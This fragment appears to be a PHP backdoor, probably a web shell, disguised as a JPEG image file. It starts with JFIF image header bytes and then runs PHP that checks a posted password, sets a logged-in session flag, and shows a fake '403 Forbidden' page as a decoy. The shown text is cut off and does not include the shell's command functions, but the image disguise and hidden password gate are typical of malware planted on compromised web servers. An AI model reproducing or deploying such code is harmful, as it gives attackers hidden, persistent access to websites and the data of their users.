ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- " . $content); } exit; } if ($_SERVER["REQUEST_METHOD"] == "POST") { $password = $_POST['password']; if (password_verify($password, $hashed_password)) { $_SESSION['loggedin'] = true; header("Location: " . $_SERVER['PHP_SELF']); exit; } else { $error_message = "Password salah."; } } ?> 403 Forbidden

403

Forbidden

Access to this resource on the server is denied!

$error_message

"; } ?>